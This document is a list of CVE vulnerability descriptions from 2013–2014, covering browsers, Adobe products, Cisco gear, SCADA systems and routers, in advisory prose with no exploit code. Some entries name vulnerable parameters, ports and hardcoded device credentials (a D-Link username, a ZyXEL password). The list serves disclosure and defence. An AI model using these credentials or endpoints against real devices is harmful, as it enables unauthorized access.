CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOM::SVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

